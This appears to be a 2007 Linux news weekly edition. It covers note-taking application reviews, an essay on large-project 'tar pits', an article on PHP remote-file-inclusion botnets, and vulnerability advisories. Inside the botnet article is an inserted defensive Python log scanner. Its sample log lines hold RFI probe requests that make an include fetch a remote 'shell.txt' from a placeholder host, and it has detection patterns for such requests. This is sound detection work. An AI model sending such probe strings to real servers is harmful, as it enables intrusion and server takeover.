Your editor is not always the most organized person. He is pretty sure he
still has a desk under the pile of papers, unpaid bills, and random
electronic components that surrounds his monitor - but he has not seen it
for some time. There are lots of sheets of paper full of handwritten notes
on that desk, but many of them have not seen the light of day for years.
There's probably some good stuff to be found in there, somewhere.
This is the information age, of course, and paper full of handwritten notes
is tremendously obsolete. Your editor's pen just doesn't have enough
fonts, and, besides, contemporary disk drives allow for the creation of
much higher piles of stuff. It's clearly time to go electronic.
There are numerous applications out there which are aimed at people trying
to create a digital note pile; your editor decided it was time to give a
few of them a try. As a way of narrowing the field somewhat, only
graphical applications were considered; command-line utilities, Emacs
modes, and so on were taken off the list. There's no shortage of web-based
wiki systems which can be employed in this role, but they are a topic for
another article some other time. Finally, there are a few systems which
are aimed at "mind mapping," which is a different objective entirely. Mind
mapping applications are on your editor's list to review, but, according to
his kids, your editor has lost his mind entirely and will thus have a hard
time mapping it.
Each application was looked at from a simple point of view: how well does
it support the tasks of quickly and easily creating, organizing, finding,
and using notes? There are, as we will see, a few approaches to this task.
xpad
There are a few applications which try to emulate the classic yellow pad of
sticky notes - but without the glue; xpad is one of those.
It maintains a series of little yellow windows, each of which can contain
simple text in a single font. The font and colors can be changed, but only
on a global basis. The first line of notes in each window becomes the
title for that window.
Like a number of note-taking applications, xpad puts an icon into the panel
task area. Simply clicking on that icon appears to do nothing - though
double-clicking causes all known notes to show up in the current
workspace. The right mouse button yields a menu with the titles of each
note window, along with "show all" and "close all" options. "Close all"
doesn't just close the windows, it causes the application to exit
completely.
There is an "edit lock" feature in xpad; it turns off editing on all
notes. There does not appear to be a way to lock a single window. There's
not a lot of other features available: no searching, no linking between
notes, no audio effects, etc. As a basic notepad, however, xpad seems good
enough.
xpostit
Xpostit may be the oldest of the applications reviewed by your editor. It
has no web page; it
would, in fact, appear to predate the web. It features those round Xaw
buttons which became briefly popular after X11R4 came out. Beyond that,
the interface is quite strange. Running xpostit pops up a single, small
(maybe 1.5cm square on your editor's display) window with a plaid,
presumably trademark-infringing design. Clicking on that window does
nothing until the right button is used, at which point the user is rewarded
with a menu allowing the creation of notes in several predefined sizes.
Note windows contain simple text in the ugliest monospace font the
developers could find. There is, beyond doubt, some X resource which can
be employed to change that font, but your editor, it must be said, has not
found messing around with X resources cool for some years now.
Xpostit is one of the few notes applications with a "save" button; most of
them save notes implicitly. There are no features of interest beyond the
provision of containers for bare text. There is no panel icon, and no way
to find a specific note beyond getting them all on-screen with "show all"
and starting to dig. In your editor's opinion, xpostit is an application
whose time has passed.
knotes
KNotes is a KDE-based notepad; like others, it is based on the little
yellow window concept. It has a more contemporary feel, however, and is
notably nicer to work with. The initial impression can be just a bit
off-putting, though, at least for those running KNotes outside of a KDE
desktop. KNotes puts up a shaped window without the usual window manager
decorations; instead, there is a yellow title bar with a red thumbtack in
it. The thumbtack does not appear to do anything other than function as a
cute example of the X11 shape extension. The title bar can be used to drag
the window around in the usual way, but employing the right button
does not yield the usual window manager menu; instead, most of the KNotes
functionality can be found there.
KNotes puts an icon in the task area; clicking on it gives a menu of note
titles. Selecting a title will move to the virtual desktop containing the
note (if any), a bit of a disorienting experience for users who are not
expecting it. Even worse, it remembers which desktop last contained a
note, and will put the note back in that desktop before moving.
The right mouse button gives a menu with a number of
options, including creating new notes, adjusting the ample (this is KDE,
after all) configuration options, and searching.
The search function is a valuable thing for a notes application to have;
once the number of notes gets large, it can get hard to remember where
something specific can be found. KNotes search is nice, in that it
searches through all notes and it supports regular expressions. There are
a couple of rough spots, though; if the next occurrence of the desired text
is in a window found on a different virtual desktop, it moves the desktop
rather than the window. Then it helpfully puts up a little "search for the
next occurrence?" dialog - directly on top of the window containing the
text the user was looking for.
There are a few features unique to KNotes. One of those is alarms, added
presumably so that the user can use notes as a simple appointment manager.
There is an option to send notes via email. It is also possible to send
notes directly to an instance of KNotes running on another system - though
the acceptance of notes over the network is (sensibly) turned off by
default. Notes can be locked on a per-note basis, preventing inadvertent
modification of notes when desired.
Another nice feature is that notes can be dismissed by hitting the escape
key. As a result, pulling up a note, adding a line, and making it go away
can be a very quick operation - and that, in turn, encourages the keeping
of good and complete notes. Without the desktop warping, KNotes would be
almost perfect as a simple, quick, capable, and visually attractive notes
manager.
It's worth noting (so to speak) that KNotes is also available as a
component of the Kontact organizer.
Running Kontact gives access to all of the notes created in KNotes, but it
appears that the full integration of this functionality is a work in
progress. Kontact notes windows look more like traditional text editing
windows; they do not appear to be intended to be left around the screen
like KNotes windows. Kontact does add a spelling checker, however. Even
so, in your editor's opinion, KNotes works better as a standalone
application at this time.
Tomboy
Tomboy is a GNOME and
Mono-based note-taking application which attempts to provide both
simplicity and useful features. Your editor has been using it for some
months now.
Tomboy places an icon on the panel - not in the task area. Clicking on
that icon yields a menu with the titles of the ten most recently modified
notes, along with create and search options. Unfortunately, your editor
seems to cycle through a set of about eleven notes, with the result that
the desired one is often not on the list. Selecting "search all notes"
brings up a dialog with all known notes and a simple search box. Typing
text into that box trims the list of notes to those containing matches.
There is no regular expression capability.
The escape key will dismiss a Tomboy window; combined with the panel icon,
this feature allows for quick note updates.
A feature unique to Tomboy - at least, among the applications reviewed here
- is the ability to link between notes. By highlighting a term, the user
can create a new note using that term as its title; thereafter, clicking on
the term will bring up the new note. There is also a backlink feature: the
tools menu includes a "what links here?" item which will give a list of
notes linking to the current one.
Tomboy has a fair number of options for decorating text with different
fonts, colors, sizes, etc. For the most part, there is not much use for
this capability in a note-taking application, but the ability to create
bold headers can be nice. It's also useful to be able to strike out text
to, for example, mark off completed items on a "to do" list. A long list
of crossed-out items just gives more satisfaction than simply deleting
them, somehow. Tomboy will also create bulleted lists when lines are typed
beginning with an asterisk.
Notes can be printed (a feature not supported by all applications) or
exported to HTML. There is a plugin mechanism which can be used to add
interesting functionality; current plugins offer integration with evolution
and bugzilla, for example. Tomboy also has a spelling checker which, by
default, decorates notes with lots of obnoxious red underlines. It is rare
that perfect spelling is required in a collection of personal notes,
however, so your editor is pleased that this feature can be turned off.
Overall, Tomboy is a nice application; your editor's biggest complaint
would be that its memory footprint is huge - even by GNOME standards. The
use of Mono cannot help in this regard; it is hard to imagine which
features in an application like this would really need the Mono framework
for their implementation. With a bit less baggage, Tomboy would be nearly
perfect.
BasKet
Finally, your editor played with BasKet, a KDE application which
celebrated its 1.0 release on February 12.
Unlike other note-taking applications, BasKet does all of its work within a
single window. At the top level, it maintains a tree of "baskets," each of
which can contain any number of notes. Only one "basket" can be viewed at
any given time. Baskets can be configured with up to three columns; notes
are then lined up in the columns. There is also a free-format mode, where
notes can be placed anywhere, even on top of each other. In your editor's
opinion, the proper metaphor might be a bulletin board - each "basket" is a
place where any number of things can be pinned and organized.
BasKet offers a great deal of control over fonts, sizes, weights, and so on.
There is a mechanism for attaching tags to notes; each tag brings with
it an icon and, perhaps, a set of heavy-handed color choices. Tagging an
item as "work," for example, turns the text a sort of dark yellow color.
There is an "insert image" operation which yields an empty note and a
dialog on how BasKet cannot do image editing. Dragging an image over from
konqueror does the expected thing - though your editor remains a little
mystified by the concept of "moving" (as opposed to "copying") an image
into the application. Baskets can also contain links, application
launchers, and other surprises.
The end result of all this stuff is that the BasKet window quickly turns
into a gaudy mess of wild colors and images. If your editor's word is not
sufficient on this fact, the BasKet screenshots page
should dispel any doubt. The BasKet developers are also enamored of
animated effects, tooltips, and the use of audio signals.
The display of any given basket can be narrowed to items marked with a
given tag. There is also a simple search mechanism which shows only the
notes containing a given string. No regular expressions are supported, and
the search only applies to the currently-displayed basket by default -
though there is an option to make it global.
There is a feature by which baskets can be globally bound to shortcut keys,
allowing them to be summoned by a single keystroke. Unfortunately, an
attempt to play
with that feature left your editor with a totally locked keyboard, a
situation which made the writing of this article rather more difficult than
it otherwise had to be. Logging in over the net and killing BasKet took
care of the problem. One assumes this behavior is not part of the original
design specification.
Summary
Of the applications reviewed, the first two (xpad and xpostit) are of
relatively little interest. They reflect the state of the desktop art as
it was several years in the past. Xpad is still a useful application, but
it has been surpassed by others.
BasKet is an interesting attempt to do new things with notes. For your
editor's needs, however, it is overkill. The whole point of note taking is
to collect ideas together, track things to do, etc. It doesn't need
images, colors, animations, sounds, and so on. BasKet seems to be more
directly aimed at people who care about making their notes collections look
cool. Your editor, who gave up any hope of looking cool back in high
school, does not need BasKet's features.
That leaves KNotes and Tomboy. Either is an entirely capable application.
The Tomboy feature set still seems like it is most directly focused on the
note-taking application; the search feature is nicer to use and linking
between notes is useful. But one could get the job done quite nicely with
either of these applications.
Comments (47 posted)
This
Washington Post article is one of many expressing disappointment with
Microsoft's Vista release, which is famously late and which has failed to
live up to Microsoft's early promises. The article claims that the
problems are not specific to Microsoft:
The sad truth is that Microsoft's woes aren't unusual in this
industry. Large-scale software projects are perennially beset by
dashed hopes and bedeviling delays. They are as much a tar pit
today as they were 30 years ago, when a former IBM program manager
named Frederick P. Brooks Jr. applied that image to them in his
classic diagnosis of the programming field's troubles, "The
Mythical Man-Month."
In this context, it behooves us to ask: is there a free software tar pit in
our future? What can we do to avoid a grim future where we bog down, our
software collapsing under its own weight?
Looking at the state of the free software community now, it is tempting to
say that, so far, we have nicely avoided the tar pit. But have we? Here
are a few dates from the past which may be of interest:
- The 2.2.0 kernel was released on January 26, 1999.
- 2.4.0 came out on January 4, 2001.
- 2.5.1 - the beginning of the next development series - was released on
December 16, 2001.
The 2.5 development series was stalled for almost one full year while 2.4
reached a state which actually approached stable. Overall, the process
from 2.2.0 to a stable 2.4 took almost three years; the kernel was in a
"feature freeze" state for about two of those years. This was a time when
quite a few people - many of them kernel developers - felt let down by the
development process. This, your editor would attest, was a tar pit era.
One might well argue that the kernel has not yet escaped that tar pit. Like
Vista, we lack a shiny new next-generation filesystem; the only credible
attempt at such a filesystem (reiser4) remains in a stalled,
feature-reduced state. It seems likely, however, that most observers would
agree that the tar pit has been left far behind. The kernel development
process has been humming along at a high pace, delivering interesting new
releases every few months. The same story can be seen in many other parts
of the free software community.
If we accept that things have gotten better, it can be interesting to look
at why. One hint can be found in the same article:
Without that discipline, too often, software teams get lost in what
are known in the field as "boil-the-ocean" projects -- vast schemes
to improve everything at once. That can be inspiring, but in the
end we might prefer that they hunker down and make incremental
improvements to rescue us from bugs and viruses and make our
computers easier to use. Idealistic software developers love to
dream about world-changing innovations; meanwhile, we wait and wait
for all the potholes to be fixed.
Any successful free software project must get good at fixing potholes; in
the worst case, users (and distributors) will do the job for themselves.
In a well-managed project, the people who are trying to improve the whole
world will not get in the way of the pothole fixers. There is no single
team, charged with all the development on a project, which can get bogged
down in that way.
A "well-managed project" must find a way to keep whole-world improvements
from stopping everything else, however. The older, multi-year kernel
process did not always succeed on that front; the attempt to improve the
entire kernel ended up bogging down the entire process. The new kernel
development model,
with its short release cycles, has caused some developers to complain that
it is no longer possible to make major changes that require a long time to
settle down. To the extent that this complaint is true, it should maybe be
seen as a good thing. By only merging changes which can be brought to a
releasable state within a month or two, the new process sidesteps the
tar pit and keeps the development machine running.
One of the key suggestions in The Mythical Man Month is the
formation of "surgical teams" to support the lead programmer(s). Some of
the team members - such as the clerk who "keys in" the code - seem a little
quaint now. But the idea that the people running the project (or parts of
it) need lieutenants, documentation writers, tool makers, etc. still makes
a lot of sense. Once upon a time, the kernel lacked much of that
structure, with everything concentrating on a single developer - Linus
Torvalds. Now there is a vast network of lieutenants. Quite a few
developers focus their effort not on the kernel, but on the tools used by
kernel developers. All that's missing are the clerks - and, perhaps,
the documentation writers.
One of the biggest anti-tar pit technologies used by the free software
community would have been hard for Mr. Brooks to imagine back in 1972:
multiple, independent development teams. Any project of any size has a
wide range of independent, sometimes conflicting development efforts
happening at the same time. If one group bogs down, the others continue
unhindered. The process may seem inefficient, given that a significant
portion of the work which is done may never survive to a stable release.
Throwing away code can be painful, but it is far less so than throwing away
the entire project.
Peer review is also missing from the Brooks landscape. But peer review
helps to ensure one of the things he thought was vital for a successful
project: a clear conceptual architecture for the project. That
architecture may take a surprising form: few free software projects have the
sort of extensive design documentation that he probably had in mind. But a
crowd of reviewers can help to ensure that new code is consistent with the
principles behind a project - and that it is maintainable into the future.
In this context, it is notable (and worrisome) that an increasing number of
proposed kernel features are finding themselves stalled by a lack of
reviews.
Finally, one should note that free software projects have mostly learned a
sure-fire way to avoid a failure to live up to their promises: they don't
make any. Vaporware tends to be scarce in this community; either the code
exists or it does not. Very few projects are truly controlled by one
corporation, so companies are also restrained in the promises they make
about future releases; they are in no position to ensure that those
promises are fulfilled. The relative freedom from marketing-driven
promises helps free software projects avoid disappointments - but it also
helps them to focus effort on objectives with a reasonable chance of
success.
To argue that the free software community is immune to the problems of
large-scale software development would be foolish. For all their growth,
many or most components of a system like Linux are still a fraction of the
size of their equivalents on certain proprietary systems. As our code base
grows, there will undoubtedly be new challenges for those who would
continue to develop it. But the free systems we have today must certainly
far exceed the size of System/360 when Mr. Brooks was managing it, and we
would appear to be going strong. With widespread community participation,
improving tools, and the willingness to change our development models in
response to real-world problems, we should be able to stay out of that
tar pit for some time yet.
Comments (57 posted)
Page editor: Jonathan Corbet
Security
February 14, 2007
This article was contributed by Jake Edge.
Collections of subverted machines, called
botnets, are typically
associated with Windows: thousands of zombie desktops sending spam and
causing other internet mayhem. Unfortunately, it is increasingly clear
that Linux boxes (as well as Mac OS X and other UNIX boxes) are
participating in botnets, but in a bit of a twist, it is mostly servers
that have been subverted. Botnets are an enormous problem that
Vint Cerf recently
estimated
may involve up to one quarter of all internet connected computers. This
translates to a botnet controller's fondest wish: 150 million zombie machines
to rent to the highest bidder.
Desktops are usually infected with a bot by an email-borne virus or a
trojan attached to some application that the user installs, much like
adware and spyware infect machines. The bot software then connects to a
'command and control' (C&C) infrastructure, which often uses Internet Relay
Chat (IRC) servers, to get instructions on what to do. The 'owner'
of a botnet (known as a bot herder) can then instruct the bots to do whatever
they, or more likely their client, want. Because the traffic
generated from a botnet comes from all over the Internet, it is difficult
or impossible to recognize it for what it is. This allows botnets to be
used for spamming, distributed denial of service (DDOS) attacks, click fraud and
other malicious activities in a largely untraceable way.
The desktop infection methods are not typically as useful for Linux boxes
and so bot herders have turned to web application exploits as a means
for collecting subverted machines. Attacking servers has the additional
advantage that they are usually machines with much greater resources:
faster network connectivity, more storage, faster processors, etc. The attacks
are largely targeted at everyone's favorite Internet security whipping
boy, PHP applications. Open source PHP applications are the
main target as they are ubiquitous and typically easy to exploit as
some recent
research
indicates. An additional benefit of targeting a higher level application
is that it is a cross-platform exploit; the operating system and web server
software are immaterial if the target is a PHP application.
The easiest type of vulnerability to exploit is often
Remote File
Inclusion (RFI) which allows an attacker to run code on a
vulnerable server with the permissions of the webserver. Generally,
those permissions are sufficient to allow the bot to do anything the herder
might wish it to; sending email and other network traffic is not normally a privileged
activity. Even a cursory glance at the Bugtraq mailing list will reveal
numerous RFI vulnerabilities; they are reported regularly and each can lead
to bot exploitation if not patched.
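As a defender-side illustration of the RFI class described above, here is an added example (not part of the article): a small Python scanner that parses Apache combined-format access log lines and flags query parameters whose value is a remote URL, the fingerprint of an attempt to make a PHP include() fetch code from another host, plus a check of the php.ini directives (allow_url_fopen, allow_url_include) that decide whether such an include can succeed. The log lines and the php.ini fragment are constructed for this example; the addresses, paths and parameter names in them are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines (Apache "combined" format). Addresses, paths
# and user agents are placeholders invented for this example.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Feb/2007:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Feb/2007:10:01:09 +0000] "GET /index.php?page=http://203.0.113.5/shell.txt? HTTP/1.1" 200 128 "-" "libwww-perl/5.805"
198.51.100.7 - - [14/Feb/2007:10:01:11 +0000] "GET /cms/inc.php?dir=https%3A%2F%2F203.0.113.5%2Fx.php%3F HTTP/1.1" 404 0 "-" "libwww-perl/5.805"
192.0.2.11 - - [14/Feb/2007:10:02:30 +0000] "GET /blog/?p=12&ref=http://example.org/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Constructed php.ini fragment with the weak setting that makes RFI possible.
SAMPLE_PHP_INI = """\
; constructed fragment for this example
allow_url_fopen = On
allow_url_include = On   ; lets include()/require() fetch over the network
"""

# Only the fields of the combined format that the scanner needs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Stream wrappers PHP can include from when allow_url_include is on.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftps?|data|php)://', re.IGNORECASE)

# PHP defaults: allow_url_fopen is On, allow_url_include is Off (PHP >= 5.2).
PHP_URL_DEFAULTS = {"allow_url_fopen": "On", "allow_url_include": "Off"}


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target, url_params_ok=frozenset()):
    """Yield (name, value) for query parameters whose value is a remote URL.

    Parameter names in url_params_ok (e.g. a legitimate referrer field) are
    skipped so that known-good URL-valued parameters do not generate noise."""
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in url_params_ok:
            continue
        # parse_qsl decoded once already; decoding again exposes values that
        # were double percent-encoded to slip past naive filters.
        decoded = unquote(value)
        if REMOTE_URL_RE.match(decoded):
            yield name, decoded


def scan_log(text, url_params_ok=frozenset()):
    """Return one finding per query parameter carrying a remote URL, in log order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue  # malformed or non-combined line: skip rather than guess
        path = urlsplit(rec["target"]).path
        for name, url in remote_url_params(rec["target"], url_params_ok):
            findings.append({
                "line": lineno, "client": rec["client"], "path": path,
                "param": name, "url": url, "status": int(rec["status"]),
            })
    return findings


def php_ini_url_settings(ini_text):
    """Read the two URL-related directives from php.ini text, applying PHP defaults."""
    settings = dict(PHP_URL_DEFAULTS)
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop php.ini comments
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key in settings:
            settings[key] = value.strip().strip('"')
    return settings


def unsafe_url_directives(ini_text):
    """Names of URL directives that are still enabled (sorted); empty means both are off."""
    off_values = {"off", "0", "false", "no", ""}
    return sorted(name for name, value in php_ini_url_settings(ini_text).items()
                  if value.lower() not in off_values)


if __name__ == "__main__":
    # Treat "ref" as a parameter that legitimately carries a URL on this site.
    for hit in scan_log(SAMPLE_LOG, url_params_ok=frozenset({"ref"})):
        print("line %(line)d: %(client)s requested %(path)s with %(param)s=%(url)s "
              "(HTTP %(status)d)" % hit)
    print("php.ini directives still allowing URL access:",
          unsafe_url_directives(SAMPLE_PHP_INI))
```

A 404 hit still matters for triage: it shows a probe against a path that may exist elsewhere in the farm, and the same client usually tries several scripts in quick succession.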
Many different types of malware can be installed on a vulnerable machine,
depending on the intent of the herder. As with the exploit itself, the
installed code tends to be written in a scripting language so that it is
cross-platform. The malware can range from simple test tools
that indicate vulnerable servers to sophisticated shells that allow the
attacker to effectively log in to the server and perform any allowed operation.
The most serious damage that these botnets have caused is to our
inbox; bots seem to be the preferred way to deliver spam these days.
Diligent anti-spam efforts tend to get spamming accounts or systems shut
down within hours but there is no easy way to shut down a spam-delivering botnet. A less
visible, but potentially more damaging effect is DDOS
attacks
on internet sites. By attacking a site and working their way up the
chain of DNS servers and registrars, a botnet can silence a site the herder
does not like or hold sites hostage until they pay a ransom.
Past efforts to thwart botnets have often focused on destroying the C&C
servers by shutting down the affected IRC sites, but botnets are
moving toward using HTTP for C&C which allows that traffic to hide amongst
the sea of similar traffic; it also has the advantage of getting through
most firewalls. Botnets will be a serious problem going forward, and Linux
systems are not immune to participation in them. The
financial incentive is large and the means of prevention are weak, at least
so far. As we have learned by trying to deal with spam, money makes our
adversaries much more inventive which makes long-term solutions hard to
come by.
Comments (31 posted)
Brief items
For those who are interested in the Solaris telnet vulnerability, Gadi
Evron has put together a comprehensive summary of the problem, how Sun
responded, where to get fixes, etc. "
Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without
too many PR/legal blocks getting in their way are very encouraging..."
Full Story (comments: 5)
New vulnerabilities
ImageMagick: buffer overflow
| Package(s): | imagemagick |
| CVE #(s): | CVE-2007-0770 |
| Created: | February 12, 2007 |
| Updated: | February 16, 2007 |
| Description: | Vladimir Nadvornik discovered a buffer overflow in GraphicsMagick and ImageMagick that allows user-assisted attackers to cause a denial of service and possibly execute arbitrary code via a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c. |
| Alerts: | |
Comments (1 posted)
MoinMoin: cross-site scripting
| Package(s): | moinmoin |
| CVE #(s): | CVE-2007-0857 |
| Created: | February 12, 2007 |
| Updated: | February 14, 2007 |
| Description: | Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin before 1.5.7 allow remote attackers to inject arbitrary web script or HTML via (1) the page info, or the page name in a (2) AttachFile, (3) RenamePage, or (4) LocalSiteMap action. |
| Alerts: | |
Comments (none posted)
rar: buffer overflow
| Package(s): | rar |
| CVE #(s): | CVE-2007-0855 |
| Created: | February 14, 2007 |
| Updated: | February 14, 2007 |
| Description: | The rar archive utility contains a buffer overflow in its processing of password-protected archives. Version 3.7.3 contains the fix. |
| Alerts: | |
Comments (none posted)
smb4k: multiple vulnerabilities
| Package(s): | smb4k |
| CVE #(s): | CVE-2007-0472, CVE-2007-0473, CVE-2007-0474, CVE-2007-0475 |
| Created: | February 13, 2007 |
| Updated: | March 12, 2007 |
| Description: | The Smb4K 0.8.0 release announcement notes several security weaknesses in the utility programs (stack overflows / the use of strcpy instead of strncpy / a design error in smb4k_kill) and in the Smb4KFileIO class (use of mktemp instead of mkstemp for creation of the temporary files, which could lead to both a race and an information leak / a race in the code that handles the lock file). Fixes for all of these issues are included in Smb4K 0.8.0 and in the patches that have been prepared for Smb4K 0.7.5 and 0.6.10a. Other versions are not supported anymore. |
| Alerts: | |
Comments (none posted)
snort: denial of service
| Package(s): | snort |
| CVE #(s): | CVE-2006-6931 |
| Created: | February 14, 2007 |
| Updated: | March 1, 2007 |
| Description: | From the Gentoo advisory: Randy Smith, Christian Estan and Somesh Jha discovered that the rule matching algorithm of Snort can be exploited in a way known as a "backtracking attack" to perform numerous time-consuming operations. Version 2.6.1.2 contains the fix. |
| Alerts: | |
Comments (none posted)
twiki: arbitrary code execution
| Package(s): | twiki |
| CVE #(s): | CVE-2007-0669 |
| Created: | February 12, 2007 |
| Updated: | February 14, 2007 |
| Description: | According to this vendor security advisory, a vulnerability exists in the SessionPlugin extension of the Wiki engine TWiki, version up to and including 4.1.0. The vulnerability allows local users to cause TWiki to execute arbitrary Perl code with the privileges of the web server process by creating CGI session files on the local filesystem. |
| Alerts: | |
Comments (none posted)
wordpress: multiple vulnerabilities
| Package(s): | wordpress |
| CVE #(s): | CVE-2007-0262, CVE-2007-0539, CVE-2007-0541 |
| Created: | February 13, 2007 |
| Updated: | February 14, 2007 |
| Description: | Wordpress does not properly verify that the m parameter value has the string data type, which allows remote attackers to obtain sensitive information via an invalid m[] parameter, as demonstrated by obtaining the path, and obtaining certain SQL information such as the table prefix. (CVE-2007-0262) WordPress before 2.1 allows remote attackers to cause a denial of service (bandwidth or thread consumption) via pingback service calls with a source URI that corresponds to a large file, which triggers a long download session without a timeout constraint. (CVE-2007-0539) WordPress allows remote attackers to determine the existence of arbitrary files, and possibly read portions of certain files, via pingback service calls with a source URI that corresponds to a local pathname, which triggers different fault codes for existing and non-existing files, and in certain configurations causes a brief file excerpt to be published as a blog comment. (CVE-2007-0541) |
| Alerts: | |
Comments (none posted)
Updated vulnerabilities
acroread: multiple vulnerabilities
| Package(s): | acroread |
| CVE #(s): | CVE-2006-5857, CVE-2007-0045, CVE-2007-0046 |
| Created: | January 11, 2007 |
| Updated: | October 26, 2009 |
| Description: | Adobe's Acrobat Reader has the following vulnerabilities: The Adobe Reader Plugin has a cross-site scripting vulnerability that can be triggered by processing malformed URLs. Arbitrary JavaScript can be served by a malicious web server, leading to a cross-site scripting attack. Maliciously crafted PDF files can be used to trigger two vulnerabilities; if an attacker can trick a user into viewing the files, arbitrary code can be executed with the user's privileges. |
| Alerts: | |
Comments (1 posted)
apache: cross-site scripting
| Package(s): | apache |
| CVE #(s): | CVE-2006-3918 |
| Created: | August 9, 2006 |
| Updated: | April 4, 2008 |
| Description: | From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header." |
| Alerts: | |
Comments (none posted)
bcfg2: local password disclosure
| Package(s): | bcfg2 |
| CVE #(s): | |
| Created: | February 1, 2007 |
| Updated: | February 7, 2007 |
| Description: | The bcfg2 configuration file has incorrect permissions; this can be used for a local password disclosure to unprivileged users. |
| Alerts: | |
Comments (none posted)
bind: denial of service
| Package(s): | bind |
| CVE #(s): | CVE-2007-0493, CVE-2007-0494 |
| Created: | January 26, 2007 |
| Updated: | March 14, 2007 |
| Description: | The bind package is vulnerable to two remote denial of service attacks in which attackers can cause the bind daemon to crash or exit unexpectedly by providing malformed data to the daemon in a DNS request. |
| Alerts: | |
Comments (none posted)
bluez-utils: hidd vulnerability
| Package(s): | bluez-utils |
| CVE #(s): | CVE-2006-6899 |
| Created: | January 16, 2007 |
| Updated: | May 14, 2007 |
| Description: | hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain control of the Mouse and Keyboard Human Interface Device (HID) via a certain configuration of two HID (PSM) endpoints, operating as a server, aka HidAttack. |
bugzilla: multiple vulnerabilities
| Package(s): | bugzilla |
| CVE #(s): | CVE-2006-5453, CVE-2006-5454, CVE-2006-5455 |
| Created: | November 10, 2006 |
| Updated: | August 28, 2007 |
| Description: | Bugzilla has the following vulnerabilities: Input data passed to various fields is not properly sanitized before being passed back to users. Users can gain unauthorized access to read attachment descriptions while using diff mode. HTTP GET and HTTP POST requests can be used to perform unauthorized actions due to improper verification. Input that is passed to showdependencygraph.cgi is not properly sanitized before being returned to users. |
busybox: insecure password generation
| Package(s): | busybox |
| CVE #(s): | CVE-2006-1058 |
| Created: | May 5, 2006 |
| Updated: | May 2, 2007 |
| Description: | The BusyBox 1.1.1 passwd command does not use a proper salt when generating passwords. This would create an instance where a brute force attack could take very little time. |
cpio: arbitrary code execution
| Package(s): | cpio |
| CVE #(s): | CVE-2005-4268 |
| Created: | January 2, 2006 |
| Updated: | March 17, 2010 |
| Description: | Richard Harms discovered that cpio did not sufficiently validate file properties when creating archives. Files with, e.g., a very large size caused a buffer overflow. By tricking a user or an automatic backup system into putting a specially crafted file into a cpio archive, a local attacker could probably exploit this to execute arbitrary code with the privileges of the target user (which is likely root in an automatic backup system). |
vixie-cron: privilege escalation
| Package(s): | cron |
| CVE #(s): | CVE-2006-2607 |
| Created: | May 31, 2006 |
| Updated: | June 1, 2009 |
| Description: | The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root. |
cscope: buffer overflows
| Package(s): | cscope |
| CVE #(s): | CVE-2006-4262 |
| Created: | October 2, 2006 |
| Updated: | June 16, 2009 |
| Description: | Will Drewry of the Google Security Team discovered several buffer overflows in cscope, a source browsing tool, which might lead to the execution of arbitrary code. |
cscope: buffer overflows
| Package(s): | cscope |
| CVE #(s): | CVE-2004-2541 |
| Created: | May 22, 2006 |
| Updated: | June 19, 2009 |
| Description: | A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows remote attackers to execute arbitrary code via a C file with a long #include line that is later browsed by the target. |
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
| Package(s): | cyrus-sasl |
| CVE #(s): | CVE-2006-1721 |
| Created: | April 21, 2006 |
| Updated: | September 4, 2007 |
| Description: | Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5 process that could lead to a Denial of Service. An attacker could possibly exploit this vulnerability by sending a specially crafted data stream to the Cyrus-SASL server, resulting in a Denial of Service even if the attacker is not able to authenticate. |
dbus: denial of service
| Package(s): | dbus |
| CVE #(s): | CVE-2006-6107 |
| Created: | December 15, 2006 |
| Updated: | February 12, 2007 |
| Description: | Unspecified vulnerability in the match_rule_equal function in bus/signals.c in D-Bus before 1.0.2 allows local applications to remove match rules for other applications and cause a denial of service (lost process messages). |
dovecot: index cache file handling error
| Package(s): | dovecot |
| CVE #(s): | CVE-2006-5973 |
| Created: | November 29, 2006 |
| Updated: | May 8, 2007 |
| Description: | The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable. |
elinks: arbitrary file access
| Package(s): | elinks |
| CVE #(s): | CVE-2006-5925 |
| Created: | November 16, 2006 |
| Updated: | October 22, 2009 |
| Description: | The elinks text-mode browser has an arbitrary file access vulnerability in the Elinks SMB protocol handler. If a user can be tricked into visiting a specially crafted web page, arbitrary files may be read or written with the user's permissions. |
fetchmail: password disclosure and DOS
| Package(s): | fetchmail |
| CVE #(s): | CVE-2006-5867, CVE-2006-5974 |
| Created: | January 10, 2007 |
| Updated: | March 16, 2007 |
| Description: | Fetchmail suffers from a password disclosure vulnerability due to a failure to use secure protocols (advisory) and a denial of service vulnerability (advisory). |
ffmpeg: buffer overflows
| Package(s): | ffmpeg |
| CVE #(s): | CVE-2006-4799, CVE-2006-4800 |
| Created: | September 14, 2006 |
| Updated: | May 28, 2007 |
